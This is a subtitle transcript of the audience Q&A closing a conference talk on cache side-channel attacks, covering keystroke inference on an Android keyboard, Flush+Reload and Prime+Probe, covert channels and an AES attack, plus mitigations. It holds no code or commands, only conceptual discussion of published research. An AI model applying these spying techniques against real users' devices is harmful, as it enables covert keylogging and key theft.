00:51:05,980 --> 00:51:13,450
M: My question is about a detail with the
keylogger. You could distinguish between
554
00:51:13,450 --> 00:51:18,150
space, backspace and alphabet, which is
quite interesting. But could you also
555
00:51:18,150 --> 00:51:22,320
figure out the specific keys that were
pressed, and if so, how?
556
00:51:22,320 --> 00:51:25,650
ML: Yeah, that depends on the
implementation of the keyboard. But what
557
00:51:25,650 --> 00:51:29,310
we did, we used the Android stock
keyboard, which is shipped with the
558
00:51:29,310 --> 00:51:34,520
Samsung, so it's pre-installed. And if you
have a table somewhere in your code, which
559
00:51:34,520 --> 00:51:39,540
says "Okay, if you press this exact
location or this image, it's an A or it's
560
00:51:39,540 --> 00:51:44,450
an B", then you can also do a more
sophisticated attack. So, if you find any
561
00:51:44,450 --> 00:51:49,050
functions or data in the code, which
directly tells you "Okay, this is this
562
00:51:49,050 --> 00:51:54,520
character," you can also spy on the actual
key characters on the keyboard.
563
00:51:54,520 --> 00:52:02,900
M: Thank you.
M: Hi. Thank you for your talk. My first
564
00:52:02,900 --> 00:52:08,570
question is: What can we actually do now,
to mitigate this kind of attack? By, for
565
00:52:08,570 --> 00:52:11,980
example switching off TSX or using ECC
RAM.
566
00:52:11,980 --> 00:52:17,410
CM: So, I think the very important thing
to protect would be, like crypto, and the
567
00:52:17,410 --> 00:52:20,840
good thing is that today we know how to
build crypto that is resistant to side-
568
00:52:20,840 --> 00:52:24,490
channel attacks. So the good thing would
be to stop using implementations that
569
00:52:24,490 --> 00:52:31,360
are known to be vulnerable for 10 years.
Then things like keystrokes is way harder
570
00:52:31,360 --> 00:52:36,830
to protect, so let's say crypto is
manageable; the whole system is clearly
571
00:52:36,830 --> 00:52:41,490
another problem. And you can have
different types of countermeasure on the
572
00:52:41,490 --> 00:52:45,780
hardware side, but that would mean that
Intel and ARM actually want to fix that,
573
00:52:45,780 --> 00:52:48,560
and that they know how to fix that. I
don't even know how to fix that in
574
00:52:48,560 --> 00:52:55,500
hardware. Then on the system side, if you
prevent some kind of memory sharing, you
575
00:52:55,500 --> 00:52:58,540
don't have Flush+Reload anymore
and Prime+Probe is much more
576
00:52:58,540 --> 00:53:04,880
noisier, so it would be an improvement.
M: Thank you.
577
00:53:04,880 --> 00:53:11,880
H: Do we have signal angel questions? No.
OK, then more microphone.
578
00:53:11,880 --> 00:53:16,630
M: Hi, thank you. I wanted to ask about
the way you establish the side-channel
579
00:53:16,630 --> 00:53:23,280
between the two processes, because it
would obviously have to be timed in a way to
580
00:53:23,280 --> 00:53:28,511
transmit information between one process
to the other. Is there anywhere that you
581
00:53:28,511 --> 00:53:32,970
documented the whole protocol? You know, it's
actually almost like the seven layers or
582
00:53:32,970 --> 00:53:36,580
something like that. There are any ways
that you documented that? It would be
583
00:53:36,580 --> 00:53:40,260
really interesting to know how it worked.
ML: You can find this information in the
584
00:53:40,260 --> 00:53:46,120
paper because there are several papers on
covert channels using that, so the NDSS
585
00:53:46,120 --> 00:53:51,300
paper is published in February I guess,
but the Armageddon paper also includes
586
00:53:51,300 --> 00:53:55,670
a covert channel, and you can
find more information about how the
587
00:53:55,670 --> 00:53:59,320
packets look like and how the
synchronization works in the paper.
588
00:53:59,320 --> 00:54:04,020
M: Thank you.
H: One last question?
589
00:54:04,020 --> 00:54:09,750
M: Hi! You mentioned that you used Osvik's
attack for the AES side-channel attack.
590
00:54:09,750 --> 00:54:17,350
Did you solve the AES round detection and
is it different to some scheduler
591
00:54:17,350 --> 00:54:21,441
manipulation?
CM: So on this one I think we only did
592
00:54:21,441 --> 00:54:24,280
some synchronous attack, so we already
knew when
593
00:54:24,280 --> 00:54:27,770
the victim is going to be scheduled and
we didn't have anything to do with
594
00:54:27,770 --> 00:54:32,930
schedulers.
M: Alright, thank you.
595
00:54:32,930 --> 00:54:37,140
H: Are there any more questions? No, I
don't see anyone. Then, thank you very
596
00:54:37,140 --> 00:54:39,132
much again to our speakers.
597
00:54:39,132 --> 00:54:42,162
applause
598
00:54:42,162 --> 00:54:58,970
music
599
00:54:58,970 --> 00:55:06,000
subtitles created by c3subtitles.de
in the year 2020. Join, and help us!